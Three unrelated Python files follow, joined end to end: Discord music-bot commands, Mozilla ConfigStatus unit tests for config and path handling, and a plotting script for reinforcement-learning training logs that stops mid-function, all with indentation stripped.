@bot.command()
async def pause(ctx):
player = music.get_player(guild_id=ctx.guild.id)
song1 = await player.pause()
em=discord.Embed(title=f"Paused {song1.name}", color=discord.Color.random())
em.set_footer(text='Invite stonk bot to other servers also')
await ctx.send(embed=em)
@bot.command()
async def resume(ctx):
player = music.get_player(guild_id=ctx.guild.id)
song2 = await player.resume()
em=discord.Embed(title=f'Resumed {song2.name}',color=discord.Color.random())
em.set_footer(text='Vote for the bot')
await ctx.send(embed=em)
@bot.command()
async def stop(ctx):
player = music.get_player(guild_id=ctx.guild.id)
await player.stop()
await ctx.send("Stopped")
@bot.command()
async def loop(ctx):
player = music.get_player(guild_id=ctx.guild.id)
song = await player.toggle_song_loop()
if song.is_looping:
await ctx.send(f"Enabled loop for {song.name}")
else:
await ctx.send(f"Disabled loop for {song.name}")
@bot.command()
async def queue(ctx):
player = music.get_player(guild_id=ctx.guild.id)
await ctx.send(f"{', '.join([song.name for song in player.current_queue()])}")
@bot.command()
async def np(ctx):
player = music.get_player(guild_id=ctx.guild.id)
song = player.now_playing()
await ctx.send(song.name)
@bot.command()
async def skip(ctx):
player = music.get_player(guild_id=ctx.guild.id)
data = await player.skip(force=True)
if len(data) == 2:
await ctx.send(f"Skipped from {data[0].name} to {data[1].name}")
else:
await ctx.send(f"Skipped {data[0].name}")
@bot.command()
async def volume(ctx, vol):
player = music.get_player(guild_id=ctx.guild.id)
song, volume = await player.change_volume(float(vol) / 100) # volume should be a float between 0 to 1
em=discord.Embed(title=f"Changed volume for {song.name} to {volume*100}%", color=discord.Color.random())
em.set_footer(text='Invite stonk bot to other servers also')
await ctx.send(embed=em)
@bot.command()
async def remove(ctx, index):
player = music.get_player(guild_id=ctx.guild.id)
song = await player.remove_from_queue(int(index))
em=discord.Embed(title=f"Removed {song.name} from the queue", color=discord.Color.random())
em.set_footer(text='Do you even read these?')
await ctx.send(embed=em)
#keep_alive()
bot.run(TOKEN)
#bot.run(os.environ[TOKEN])
#@commands.command(aliases=["slots", "bet"])
#@<EMAIL>(rate=1, per=3.0, type=commands.BucketType.user)
#async def slot(self, ctx):
# """ Roll the slot machine """
#emojis = "🍎🍊🍐🍋🍉🍇🍓🍒"
#a = random.choice(emojis)
#b = random.choice(emojis)
#c = random.choice(emojis)
#slotmachine = f"**[ {a} {b} {c} ]\n{ctx.author.name}**,"
#if (a == b == c):
# await ctx.send(f"{slotmachine} All matching, you won! 🎉")
# elif (a == b) or (a == c) or (b == c):
# await ctx.send(f"{slotmachine} 2 in a row, you won! 🎉")
#else:
# await ctx.send(f"{slotmachine} No match, you lost 😢")
|
from __future__ import with_statement
import os, posixpath
from StringIO import StringIO
import unittest
from mozunit import main, MockedOpen
import ConfigStatus
from ConfigStatus import FileAvoidWrite
class ConfigEnvironment(ConfigStatus.ConfigEnvironment):
def __init__(self, **args):
ConfigStatus.ConfigEnvironment.__init__(self, **args)
# Be helpful to unit tests
if not 'top_srcdir' in self.substs:
if os.path.isabs(self.topsrcdir):
self.substs['top_srcdir'] = self.topsrcdir.replace(os.sep, '/')
else:
self.substs['top_srcdir'] = ConfigStatus.relpath(self.topsrcdir, self.topobjdir).replace(os.sep, '/')
class TestFileAvoidWrite(unittest.TestCase):
def test_file_avoid_write(self):
'''Test the FileAvoidWrite class
'''
with MockedOpen({'file': 'content'}):
# Overwriting an existing file replaces its content
with FileAvoidWrite('file') as file:
file.write('bazqux')
self.assertEqual(open('file', 'r').read(), 'bazqux')
# Creating a new file (obviously) stores its content
with FileAvoidWrite('file2') as file:
file.write('content')
self.assertEqual(open('file2').read(), 'content')
class MyMockedOpen(MockedOpen):
'''MockedOpen extension to raise an exception if something
attempts to write in an opened file.
'''
def __call__(self, name, mode):
if 'w' in mode:
raise Exception, 'Unexpected open with write mode'
return MockedOpen.__call__(self, name, mode)
with MyMockedOpen({'file': 'content'}):
# Validate that MyMockedOpen works as intended
file = FileAvoidWrite('file')
file.write('foobar')
self.assertRaises(Exception, file.close)
# Check that no write actually happens when writing the
# same content as what already is in the file
with FileAvoidWrite('file') as file:
file.write('content')
class TestEnvironment(unittest.TestCase):
def test_auto_substs(self):
'''Test the automatically set values of ACDEFINES, ALLDEFINES
and ALLSUBSTS.
'''
env = ConfigEnvironment(
defines = [ ('foo', 'bar'), ('baz', 'qux 42'),
('abc', 'def'), ('extra', 'foobar') ],
non_global_defines = ['extra', 'ignore'],
substs = [ ('FOO', 'bar'), ('ABC', 'def'),
('bar', 'baz qux'), ('zzz', '"abc def"') ])
# non_global_defines should be filtered out in ACDEFINES and
# ALLDEFINES.
# Original order of the defines need to be respected in ACDEFINES
self.assertEqual(env.substs['ACDEFINES'], '''-Dfoo=bar -Dbaz=qux\ 42 -Dabc=def''')
# ALLDEFINES, on the other hand, needs to be sorted
self.assertEqual(env.substs['ALLDEFINES'], '''#define abc def
#define baz qux 42
#define foo bar''')
# Likewise for ALLSUBSTS, which also mustn't contain ALLDEFINES
# but contain ACDEFINES
self.assertEqual(env.substs['ALLSUBSTS'], '''ABC = def
ACDEFINES = -Dfoo=bar -Dbaz=qux\ 42 -Dabc=def
FOO = bar
bar = baz qux
zzz = "abc def"''')
def test_config_file(self):
'''Test the creation of config files.
'''
with MockedOpen({'file.in': '''#ifdef foo
@foo@
@bar@
'''}):
env = ConfigEnvironment(substs = [ ('foo', 'bar baz') ])
env.create_config_file('file')
self.assertEqual(open('file', 'r').read(), '''#ifdef foo
bar baz
@bar@
''')
def test_config_header(self):
'''Test the creation of config headers.
'''
with MockedOpen({'file.in': '''
/* Comment */
#define foo
#define foo 42
#undef foo
#define bar
#define bar 42
#undef bar
# undef baz
#ifdef foo
# undef foo
# define foo 42
# define foo 42
#endif
'''}):
env = ConfigEnvironment(defines = [ ('foo', 'baz qux'), ('baz', 1) ])
env.create_config_header('file')
self.assertEqual(open('file','r').read(), '''
/* Comment */
#define foo
#define foo baz qux
#define foo baz qux
#define bar
#define bar 42
/* #undef bar */
# define baz 1
#ifdef foo
# define foo baz qux
# define foo baz qux
# define foo baz qux
#endif
''')
# Tests for get_relative_srcdir, get_depth, get_input and get_file_srcdir,
# depending on various cases of top source directory and top build
# directory location.
class TestPaths(unittest.TestCase):
def setUp(self):
self.dir = os.path.basename(os.path.abspath(os.curdir))
self.absolute = os.path.normpath('/absolute')
class TestPathsLocalBuildDir(TestPaths):
def get_env(self, topsrcdir):
env = ConfigEnvironment(topsrcdir = topsrcdir, topobjdir = '.')
self.assertEqual(env.get_relative_srcdir('file'), '.')
self.assertEqual(env.get_relative_srcdir('dir/file'), 'dir')
self.assertEqual(env.get_relative_srcdir('deeply/nested/path/to/file'), 'deeply/nested/path/to')
self.assertEqual(env.get_depth('file'), '.')
self.assertEqual(env.get_depth('dir/file'), '..')
self.assertEqual(env.get_depth('deeply/nested/path/to/file'), '../../../..')
return env
def test_paths_local_build_local_src(self):
# topsrcdir = . ; topobjdir = .
env = self.get_env('.')
self.assertEqual(env.get_input('file'), 'file.in')
self.assertEqual(env.get_input('dir/file'), os.path.join('dir', 'file.in'))
self.assertEqual(env.get_top_srcdir('file'), '.')
self.assertEqual(env.get_top_srcdir('dir/file'), '..')
self.assertEqual(env.get_file_srcdir('file'), '.')
self.assertEqual(env.get_file_srcdir('dir/file'), '../dir')
def test_paths_local_build_parent_src(self):
# topsrcdir = .. ; topobjdir = .
env = self.get_env('..')
self.assertEqual(env.get_input('file'), os.path.join('..', 'file.in'))
self.assertEqual(env.get_input('dir/file'), os.path.join('..', 'dir', 'file.in'))
self.assertEqual(env.get_top_srcdir('file'), '..')
self.assertEqual(env.get_top_srcdir('dir/file'), '../..')
self.assertEqual(env.get_file_srcdir('file'), '..')
self.assertEqual(env.get_file_srcdir('dir/file'), '../../dir')
def test_paths_local_build_absolute_src(self):
# topsrcdir = /absolute ; topobjdir = /absolute
env = self.get_env(self.absolute)
self.assertEqual(env.get_input('file'), os.path.join(self.absolute, 'file.in'))
self.assertEqual(env.get_input('dir/file'), os.path.join(self.absolute, 'dir', 'file.in'))
self.assertEqual(env.get_input('%s/file' % self.dir), os.path.join(self.absolute, self.dir, 'file.in'))
self.assertEqual(env.get_top_srcdir('file'), '/absolute')
self.assertEqual(env.get_top_srcdir('dir/file'), '/absolute')
self.assertEqual(env.get_top_srcdir('%s/file' % dir), '/absolute')
self.assertEqual(env.get_file_srcdir('file'), '/absolute')
self.assertEqual(env.get_file_srcdir('dir/file'), '/absolute/dir')
self.assertEqual(env.get_file_srcdir('%s/file' % dir), '/absolute/%s' % dir)
class TestPathsParentBuildDir(TestPaths):
def get_env(self, topsrcdir):
env = ConfigEnvironment(topsrcdir = topsrcdir, topobjdir = '..')
self.assertEqual(env.get_relative_srcdir('..'), '.')
self.assertEqual(env.get_relative_srcdir('file'), self.dir)
self.assertEqual(env.get_relative_srcdir('dir/file'), '%s/dir' % self.dir)
self.assertEqual(env.get_relative_srcdir('deeply/nested/path/to/file'), '%s/deeply/nested/path/to' % self.dir)
self.assertEqual(env.get_depth('../file'), '.')
self.assertEqual(env.get_depth('file'), '..')
self.assertEqual(env.get_depth('dir/file'), '../..')
self.assertEqual(env.get_depth('deeply/nested/path/to/file'), '../../../../..')
return env
def test_paths_parent_build_parent_src(self):
# topsrcdir = .. ; topobjdir = ..
env = self.get_env('..')
self.assertEqual(env.get_input('../file'), os.path.join('..', 'file.in'))
self.assertEqual(env.get_input('file'), os.path.join('..', self.dir, 'file.in'))
self.assertEqual(env.get_input('dir/file'), os.path.join('..', self.dir, 'dir', 'file.in'))
self.assertEqual(env.get_top_srcdir('../file'), '.')
self.assertEqual(env.get_top_srcdir('file'), '..')
self.assertEqual(env.get_top_srcdir('dir/file'), '../..')
self.assertEqual(env.get_file_srcdir('../file'), '.')
self.assertEqual(env.get_file_srcdir('file'), '../%s' % self.dir)
self.assertEqual(env.get_file_srcdir('dir/file'), '../../%s/dir' % self.dir)
def test_paths_parent_build_ancestor_src(self):
# topsrcdir = ../.. ; topobjdir = ..
env = self.get_env('../..')
self.assertEqual(env.get_input('../file'), os.path.join('..', '..', 'file.in'))
self.assertEqual(env.get_input('file'), os.path.join('..', '..', self.dir, 'file.in'))
self.assertEqual(env.get_input('dir/file'), os.path.join('..', '..', self.dir, 'dir', 'file.in'))
self.assertEqual(env.get_top_srcdir('../file'), '..')
self.assertEqual(env.get_top_srcdir('file'), '../..')
self.assertEqual(env.get_top_srcdir('dir/file'), '../../..')
self.assertEqual(env.get_file_srcdir('../file'), '..')
self.assertEqual(env.get_file_srcdir('file'), '../../%s' % self.dir)
self.assertEqual(env.get_file_srcdir('dir/file'), '../../../%s/dir' % self.dir)
def test_paths_parent_build_absolute_src(self):
# topsrcdir = /absolute ; topobjdir = ..
env = self.get_env(self.absolute)
self.assertEqual(env.get_input('../file'), os.path.join(self.absolute, 'file.in'))
self.assertEqual(env.get_input('file'), os.path.join(self.absolute, self.dir, 'file.in'))
self.assertEqual(env.get_input('dir/file'), os.path.join(self.absolute, self.dir, 'dir', 'file.in'))
self.assertEqual(env.get_top_srcdir('../file'), '/absolute')
self.assertEqual(env.get_top_srcdir('file'), '/absolute')
self.assertEqual(env.get_top_srcdir('dir/file'), '/absolute')
self.assertEqual(env.get_file_srcdir('../file'), '/absolute')
self.assertEqual(env.get_file_srcdir('file'), '/absolute/%s' % self.dir)
self.assertEqual(env.get_file_srcdir('dir/file'), '/absolute/%s/dir' % self.dir)
class TestPathsRelativeBuild(TestPaths):
def get_env(self, topsrcdir):
env = ConfigEnvironment(topsrcdir = topsrcdir, topobjdir = 'relative')
self.assertEqual(env.get_relative_srcdir('relative/file'), '.')
self.assertEqual(env.get_relative_srcdir('relative/dir/file'), 'dir')
self.assertEqual(env.get_relative_srcdir('relative/deeply/nested/path/to/file'), 'deeply/nested/path/to')
self.assertEqual(env.get_depth('relative/file'), '.')
self.assertEqual(env.get_depth('relative/dir/file'), '..')
self.assertEqual(env.get_depth('relative/deeply/nested/path/to/file'), '../../../..')
return env
def test_paths_relative_build_relative_src(self):
# topsrcdir = relative ; topobjdir = relative
env = self.get_env('relative')
self.assertEqual(env.get_input('relative/file'), os.path.join('relative', 'file.in'))
self.assertEqual(env.get_input('relative/dir/file'), os.path.join('relative', 'dir', 'file.in'))
self.assertEqual(env.get_top_srcdir('relative/file'), '.')
self.assertEqual(env.get_top_srcdir('relative/dir/file'), '..')
self.assertEqual(env.get_file_srcdir('relative/file'), '.')
self.assertEqual(env.get_file_srcdir('relative/dir/file'), '../dir')
def test_paths_relative_build_local_src(self):
# topsrcdir = . ; topobjdir = relative
env = self.get_env('.')
self.assertEqual(env.get_input('relative/file'), 'file.in')
self.assertEqual(env.get_input('relative/dir/file'), os.path.join('dir', 'file.in'))
self.assertEqual(env.get_top_srcdir('relative/file'), '..')
self.assertEqual(env.get_top_srcdir('relative/dir/file'), '../..')
self.assertEqual(env.get_file_srcdir('relative/file'), '..')
self.assertEqual(env.get_file_srcdir('relative/dir/file'), '../../dir')
def test_paths_relative_build_parent_src(self):
# topsrcdir = .. ; topobjdir = relative
env = self.get_env('..')
self.assertEqual(env.get_input('relative/file'), os.path.join('..', 'file.in'))
self.assertEqual(env.get_input('relative/dir/file'), os.path.join('..', 'dir', 'file.in'))
self.assertEqual(env.get_top_srcdir('relative/file'), '../..')
self.assertEqual(env.get_top_srcdir('relative/dir/file'), '../../..')
self.assertEqual(env.get_file_srcdir('relative/file'), '../..')
self.assertEqual(env.get_file_srcdir('relative/dir/file'), '../../../dir')
def test_paths_relative_build_absolute_src(self):
# topsrcdir = /absolute ; topobjdir = relative
env = self.get_env(self.absolute)
self.assertEqual(env.get_input('relative/file'), os.path.join(self.absolute, 'file.in'))
self.assertEqual(env.get_input('relative/dir/file'), os.path.join(self.absolute, 'dir', 'file.in'))
self.assertEqual(env.get_top_srcdir('relative/file'), '/absolute')
self.assertEqual(env.get_top_srcdir('relative/dir/file'), '/absolute')
self.assertEqual(env.get_file_srcdir('relative/file'), '/absolute')
self.assertEqual(env.get_file_srcdir('relative/dir/file'), '/absolute/dir')
class TestPathsAbsoluteBuild(unittest.TestCase):
def setUp(self):
self.absolute_build = os.path.normpath('/absolute/build')
def get_env(self, topsrcdir):
env = ConfigEnvironment(topsrcdir = topsrcdir, topobjdir = self.absolute_build)
self.assertEqual(env.get_relative_srcdir('/absolute/build/file'), '.')
self.assertEqual(env.get_relative_srcdir('/absolute/build/dir/file'), 'dir')
self.assertEqual(env.get_relative_srcdir('/absolute/build/deeply/nested/path/to/file'), 'deeply/nested/path/to')
self.assertEqual(env.get_depth('/absolute/build/file'), '.')
self.assertEqual(env.get_depth('/absolute/build/dir/file'), '..')
self.assertEqual(env.get_depth('/absolute/build/deeply/nested/path/to/file'), '../../../..')
return env
def test_paths_absolute_build_same_src(self):
# topsrcdir = /absolute/build ; topobjdir = /absolute/build
env = self.get_env(self.absolute_build)
self.assertEqual(env.get_input('/absolute/build/file'), os.path.join(self.absolute_build, 'file.in'))
self.assertEqual(env.get_input('/absolute/build/dir/file'), os.path.join(self.absolute_build, 'dir', 'file.in'))
self.assertEqual(env.get_top_srcdir('/absolute/build/file'), '/absolute/build')
self.assertEqual(env.get_top_srcdir('/absolute/build/dir/file'), '/absolute/build')
self.assertEqual(env.get_file_srcdir('/absolute/build/file'), '/absolute/build')
self.assertEqual(env.get_file_srcdir('/absolute/build/dir/file'), '/absolute/build/dir')
def test_paths_absolute_build_ancestor_src(self):
# topsrcdir = /absolute ; topobjdir = /absolute/build
absolute = os.path.dirname(self.absolute_build)
env = self.get_env(absolute)
self.assertEqual(env.get_input('/absolute/build/file'), os.path.join(absolute, 'file.in'))
self.assertEqual(env.get_input('/absolute/build/dir/file'), os.path.join(absolute, 'dir', 'file.in'))
self.assertEqual(env.get_top_srcdir('/absolute/build/file'), '/absolute')
self.assertEqual(env.get_top_srcdir('/absolute/build/dir/file'), '/absolute')
self.assertEqual(env.get_file_srcdir('/absolute/build/file'), '/absolute')
self.assertEqual(env.get_file_srcdir('/absolute/build/dir/file'), '/absolute/dir')
def test_paths_absolute_build_different_src(self):
# topsrcdir = /some/path ; topobjdir = /absolute/build
absolute = os.path.normpath('/some/path')
env = self.get_env(absolute)
self.assertEqual(env.get_input('/absolute/build/file'), os.path.join(absolute, 'file.in'))
self.assertEqual(env.get_input('/absolute/build/dir/file'), os.path.join(absolute, 'dir', 'file.in'))
self.assertEqual(env.get_top_srcdir('/absolute/build/file'), '/some/path')
self.assertEqual(env.get_top_srcdir('/absolute/build/dir/file'), '/some/path')
self.assertEqual(env.get_file_srcdir('/absolute/build/file'), '/some/path')
self.assertEqual(env.get_file_srcdir('/absolute/build/dir/file'), '/some/path/dir')
if __name__ == "__main__":
main()
|
import os
import re
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import style
from util import stats, game_info as gi
from configparser import ConfigParser
from scipy.interpolate import spline
PROJECT_ROOT = str(__file__).replace("util/graphs/offline_graphs.py", "")
TEMP_DIR = PROJECT_ROOT + "util/temp/"
LOG_DIR = PROJECT_ROOT + "util/logs/"
NET_DIR = PROJECT_ROOT + "Networks/saved/"
SAVE_DIR = "E:/Studium/6. Semester/Bachelorarbeit/Diagrams/"
VERBOSE = False
action_counts_all_tob = [1649783, 309527, 147870, 141391, 320286, 178412, 274622, 165084,
239448, 251223, 188318, 290155, 213037, 232899, 169770, 199118,
314126, 207407, 147208, 193214, 130571, 165308, 296463, 177198,
177655, 237462, 240246, 213827, 169740, 202578, 149248, 117873,
198860, 311093, 236327, 197635]
def height():
x = [i * 20 for i in range(101)]
y1 = [(20 * i) / 2000.0 for i in range(101)]
y2 = [((20 * i) / 2000.0) ** 2 for i in range(101)]
y3 = [((20 * i) / 2000.0) ** 3 for i in range(101)]
y4 = [((20 * i) / 2000.0) ** 4 for i in range(101)]
plt.plot(x, y1, x, y2, x, y3, x, y4)
plt.show()
def angle_to():
x = [i - 180 for i in range(361)]
y1 = [max(0.0, (((180 - abs(x[i])) / 180.0) - 0.5) * 2) for i in range(361)]
y2 = []
for i in range(361):
if y1[i] < 0:
y2.append(-(y1[i] ** 2))
else:
y2.append(y1[i] ** 2)
y3 = []
for i in range(361):
y3.append(y1[i] ** 3)
y4 = []
for i in range(361):
if y1[i] < 0:
y4.append(-(y1[i] ** 4))
else:
y4.append(y1[i] ** 4)
plt.plot(x, y1, x, y2, x, y3, x, y4)
plt.show()
def bool_height():
x = [i * 20 for i in range(101)]
y = [0 for _ in range(101)]
y[int(len(y) / 2):] = [1 for _ in range(int(len(y) / 2) + 1)]
plt.plot(x, y)
plt.show()
def bool_angle():
x = [i - 180 for i in range(361)]
y = [0 for _ in range(361)]
y[int(len(y) / 2) - 60: int(len(y) / 2) + 60] = [1 for _ in range(120)]
plt.plot(x, y)
plt.show()
def discrete_height(step_size=20):
x = [i * 20 for i in range(101)]
y1 = [(20 * step_size * int(i / step_size)) / 2000.0 for i in range(101)]
y2 = [y1[i] ** 2 for i in range(101)]
y3 = [y1[i] ** 3 for i in range(101)]
y4 = [y1[i] ** 4 for i in range(101)]
plt.plot(x, y1, x, y2, x, y3, x, y4)
plt.show()
def discrete_angle(step_size=20, no_neg=False):
x = [i - 180 for i in range(361)]
y1 = [(((180 - abs(x[i])) / 180.0) - 0.5) * 2 for i in range(361)]
if no_neg:
y1 = [max(0.0, y1[i]) for i in range(361)]
n_sections = int(len(x) / step_size) + 1
for a in range(n_sections - 1):
y1[a * step_size: (a + 1) * step_size] = [y1[a * step_size] for _ in range(step_size)]
x = [x[i] - step_size / 2 for i in range(361)]
y2 = []
for i in range(361):
if y1[i] < 0:
y2.append(-(y1[i] ** 2))
else:
y2.append(y1[i] ** 2)
y3 = []
for i in range(361):
y3.append(y1[i] ** 3)
y4 = []
for i in range(361):
if y1[i] < 0:
y4.append(-(y1[i] ** 4))
else:
y4.append(y1[i] ** 4)
plt.plot(x, y1, x, y2, x, y3, x, y4)
plt.show()
def reward_graph(net_name):
print(net_name)
y = np.loadtxt(LOG_DIR + net_name + "/reward_info.csv", delimiter=",").transpose().tolist()
x = [i for i in range(len(y[0]))]
plot_names = ["re_height", "re_airtime", "re_ball_dist", "re_facing_up", "re_facing_opp", "re_facing_ball"]
figure = plt.figure()
for i in range(6):
axis = figure.add_subplot(2, 3, i + 1)
axis.set_title(plot_names[i], fontdict={"fontsize": 12})
axis.plot(x, y[i])
print(plot_names[i] + ": " + str(round(sum(y[i]) / len(y[i]), 3)))
if VERBOSE:
plt.show()
print()
def show_all(src_dir, save_dir):
for info in infos:
if isinstance(info["file"], list):
vals = []
for file in info["file"]:
vals.append(np.loadtxt(src_dir + file, delimiter=","))
vals = np.array(vals)
else:
vals = np.loadtxt(src_dir + info["file"], delimiter=",")
if vals.shape == () or vals.shape[0] <= 1:
print("bad values:", src_dir.split("/")[-2], info["file"])
continue
info["plot_func"](info["title"], vals, save_dir)
def est_errs_full_plot(title, vals, save_dir):
s = max(vals) / 50
bins = [0]
for i in range(50):
next_bin = int(i * s)
if next_bin > bins[-1]:
bins.append(next_bin)
plt.title(title, fontdict={"fontsize": 12})
plt.hist(vals, bins, histtype="bar")
if VERBOSE:
plt.show()
plt.savefig(save_dir + "est errs full")
plt.clf()
def est_errs_low_plot(title, vals, save_dir):
bins = [i for i in range(25)]
plt.title(title, fontdict={"fontsize": 12})
plt.hist(vals, bins, histtype="bar")
if VERBOSE:
plt.show()
plt.savefig(save_dir + "est errs low.png")
plt.clf()
def state_diff_plot(title, vals, save_dir):
n_displayed = 100
vals = np.split(vals, len(vals[0]), axis=1)
for i in range(len(vals)):
y = stats.average_into(vals[i], n_displayed)
x = np.linspace(0, len(y), len(y))
plt.title(title, fontdict={"fontsize": 12})
plt.plot(x, y)
if VERBOSE:
plt.show()
plt.savefig(save_dir + "sd" + str(i) + ".png")
plt.clf()
def q_vals_plot(title, vals, save_dir):
n_displayed = 100
real_q_vals = vals[0]
pred_q_vals = vals[1]
try:
n_qs = len(real_q_vals[0])
except TypeError:
print("too few q_value entries")
return
real_q_vals = np.array_split(real_q_vals, n_qs, axis=1)
pred_q_vals = np.array_split(pred_q_vals, n_qs, axis=1)
for i in range(n_qs):
y_r = stats.average_into(real_q_vals[i], n_displayed)
y_p = stats.average_into(pred_q_vals[i], n_displayed)
x = [i for i in range(len(y_r))]
plt.title(title, fontdict={"fontsize": 12})
plt.plot(x, y_r, x, y_p)
if VERBOSE:
plt.show()
plt.savefig(save_dir + "qv" + str(i) + ".png")
plt.clf()
def simple_averaged_plot(title, vals, save_dir):
n_points = min(len(vals), 100)
x = [i * (len(vals) / n_points) for i in range(n_points)]
y = stats.average_into(vals, n_points)
plt.title(title, fontdict={"fontsize": 12})
plt.plot(x, y)
if VERBOSE:
plt.show()
plt.savefig(save_dir + title + ".png")
plt.clf()
def net_output_plot(title, vals, save_dir):
net_plot_helper(title, vals)
plt.savefig(save_dir + "actions full.png")
plt.clf()
start = min(len(vals) - 1, 100)
net_plot_helper(title, vals[-start:-1])
plt.savefig(save_dir + "actions 100.png")
plt.clf()
start = min(len(vals) - 1, 10)
net_plot_helper(title, vals[-start:-1])
plt.savefig(save_dir + "actions 10.png")
plt.clf()
plt.title(title, fontdict={"fontsize": 12})
try:
plt.hist(vals[-1], [i for i in range(len(vals[0]))], histtype="bar")
except ValueError:
plt.hist(vals[-1], [i for i in range(len(vals[0]))], range=(0, len(vals[0])), histtype="bar")
if VERBOSE:
plt.show()
def net_plot_helper(title, vals):
y = []
for a in range(len(vals[0])):
y_cur = 0
for iter in range(len(vals)):
y_cur += vals[iter][a]
y.append(y_cur / len(vals))
x = [i for i in range(len(y))]
plt.title(title, fontdict={"fontsize": 12})
plt.bar(x, y)
if VERBOSE:
plt.show()
def reward_comparison(bots, max_reward=1e+6, norm_len=None, norm_y=False, ref=None, n_points=100, legend=False):
"""
Creates a diagram with a line for each bot, displaying the reward they got throughout training
:param bots: the id's of the bots for the diagram
:param max_reward: cutoff point for rewards; any bot with a maximum reward greater than max_reward will not be
included in the diagram
:param norm_len: specifies the maximum value on the x-Axis, all lines will be streched to this length
if None the x-Axis will go from 0 to the episode count of the longest running bot
:param norm_y: whether the values are per iteration or per episode (for bots with task tob all episodes have the
same length; by dividing the per-episode-value by the episode length a per-iteration-value is calculated)
:param ref: the reference value for the bots (how much reward random action yields in the given circumstance)
:param n_points: how many points are displayed of each line (high variance can clutter the diagram if n_points is too high)
:param legend: whether the legend is displayed
:return:
"""
avrg_x = norm_len if norm_len is not None else 0
averages = np.zeros([n_points])
avrg_ep_len = 0
for b in bots:
description = descriptor(b, delimiter=", ")
ep_lens = np.loadtxt(LOG_DIR + b + "/episode_lengths.csv", delimiter=",")
ep_len = max(1, int(sum(ep_lens)/len(ep_lens)))
avrg_ep_len += ep_len
rewards = np.loadtxt(LOG_DIR + b + "/reward_info.csv", delimiter=",")
rewards = np.sum(rewards, axis=1)
rewards = reduce_rewards(rewards, ep_len, norm=norm_y)
if max(rewards) > max_reward:
continue
print(b)
print(description)
m_index = np.argmax(rewards)
print("Max: {0:.2f} at {1:d} ({2:d}|{3:.2f}%)".format(max(rewards), m_index, len(rewards), 100 * m_index / len(rewards)))
print("Last:", rewards[-1])
print(stats.DistributionInfo(rewards))
print()
x_max = len(rewards) if norm_len is None else norm_len
if x_max > avrg_x:
avrg_x = x_max
x_old = np.linspace(0, x_max, len(rewards))
x_new = np.linspace(0, x_max, n_points)
smoothed = spline(x_old, rewards, x_new)
plt.plot(x_new, smoothed, label=description)
for i in range(n_points):
averages[i] += smoothed[i]
avrg_ep_len /= len(bots)
avrg_x = np.linspace(0, avrg_x, n_points)
averages = [val / len(bots) for val in averages]
plt.plot(avrg_x, averages, label="average", color="k", linestyle="--")
if ref is not None:
if norm_y:
ref_y = [ref for _ in range(n_points)]
else:
ref_y = [ref*avrg_ep_len for _ in range(n_points)]
plt.plot(avrg_x, ref_y, label="reference", color="k")
if legend:
plt.legend(loc="upper center", fontsize=12, framealpha=1)
plt.show()
plt.clf()
def action_summation(bots, n_actions):
action_counts = np.zeros([n_actions])
for i, bot_name in enumerate(bots):
data = np.loadtxt(LOG_DIR + bot_name + "/net_output.csv", delimiter=",")
for i in range(len(data)):
action_counts[np.argmax(data[i])] += 1
print(str(i/len(bots)) + "%")
print(action_counts)
x = np.linspace(0, len(action_counts), len(action_counts))
plt.bar(x, action_counts)
plt.show()
plt.clf()
def avrg_episode_length(bots):
data = []
for bot_name in bots:
ep_lens = np.loadtxt(LOG_DIR + bot_name + "/episode_times.csv")
data.append(ep_lens)
max_len = max([len(row) for row in data])
'''
y = np.zeros([max_len])
n = np.zeros([max_len])
for r in range(len(data)):
for c in range(len(data[r])):
y[c] += data[r][c]
n[c] += 1
for i in range(len(y)):
y[i] /= n[i]
print(y)
print(n)
'''
for y in data:
x = [i for i in range(len(y))]
plt.plot(x, y)
plt.show()
plt.clf()
def rare_actions(bots, n_actions):
for i, bot_name in enumerate(bots):
rares = np.zeros([n_actions])
data = np.loadtxt(LOG_DIR + bot_name + "/net_output.csv", delimiter=",")
for x in range(len(data)):
for y in range(len(data[x])):
if data[x][y] == 0:
rares[y] += 1
print(bot_name, rares)
print()
def reduce_rewards(rewards, ep_len, norm=False):
res = []
n_sections = int(len(rewards)/ep_len)
for n in range(n_sections):
start = n*ep_len
end = start + ep_len
res.append(sum(rewards[start:end]))
if norm:
res[-1] /= ep_len
return res
def get_bots(net_type=None, bot_type=None, task=None, sarsa=None, neg_reward=None, include_reference=False):
reader = ConfigParser()
reader.read(LOG_DIR + "run_index.cfg")
bots = []
for bot_name in reader.keys():
if not include_reference and re.search("ref", bot_name) is not None:
continue
try:
d = descriptor(bot_name).split(":")
except BadBotError as e:
print(e)
continue
match_nt = net_type is None or d[0] == net_type
match_bt = bot_type is None or d[1] == bot_type
match_t = task is None or d[2] == task
match_s = sarsa is None or d[3] == sarsa
match_nr = neg_reward is None or d[4] == neg_reward
if match_nt and match_bt and match_t and match_s and match_nr:
print(bot_name, d)
bots.append(bot_name)
if len(bots) == 0:
print("no bots found")
return bots
def fix_neg_reward():
reader = ConfigParser()
reader.read(LOG_DIR + "run_index.cfg")
for bot_name in reader.keys():
try:
_ = reader[bot_name]["neg_reward"]
except KeyError:
try:
rewards = np.loadtxt(LOG_DIR + bot_name + "/reward_info.csv", delimiter=",")
min_reward = np.min(rewards)
if min_reward < 0:
reader[bot_name]["neg_reward"] = "True"
else:
reader[bot_name]["neg_reward"] = "False"
except OSError:
print("could not decide neg reward for", bot_name)
with open(LOG_DIR + "run_index_corrected.cfg", "w") as file:
reader.write(file)
def descriptor(bot_name, delimiter=":"):
run_index = ConfigParser()
run_index.read(LOG_DIR + "run_index.cfg")
try:
bot_info = run_index[bot_name]
except KeyError:
raise BadBotError(bot_name, "not found")
try:
end_conditions = bot_info["end_conditions"].split(", ")
except KeyError:
raise BadBotError(bot_name, "No end condition info")
if end_conditions[0] != "None":
task = "tob"
else:
task = "fly"
try:
sarsa = "s" if bot_info["sarsa"] == "True" else "x"
except KeyError:
raise BadBotError(bot_name, "No sarsa info")
try:
neg_reward = "n" if bot_info["neg_reward"] == "True" else "x"
except KeyError:
try:
rewards = np.loadtxt(LOG_DIR + bot_name + "/reward_info.csv", delimiter=",")
except OSError:
raise BadBotError(bot_name, "no reward info")
min_reward = np.min(rewards)
neg_reward = "n" if min_reward < 0 else "x"
bot_type = bot_info["bot_type"]
return net_descriptor(bot_name) + delimiter + bot_type + delimiter + task + delimiter + sarsa + delimiter + neg_reward
def net_descriptor(bot_name):
net_cfg = ConfigParser()
net_cfg.read(NET_DIR + bot_name + "/net.cfg")
net_format = ""
if int(net_cfg["Layer0"]["size"]) == 256:
net_format += "c"
else:
net_format += "f"
size = int(net_cfg["Format"]["n_layers"])
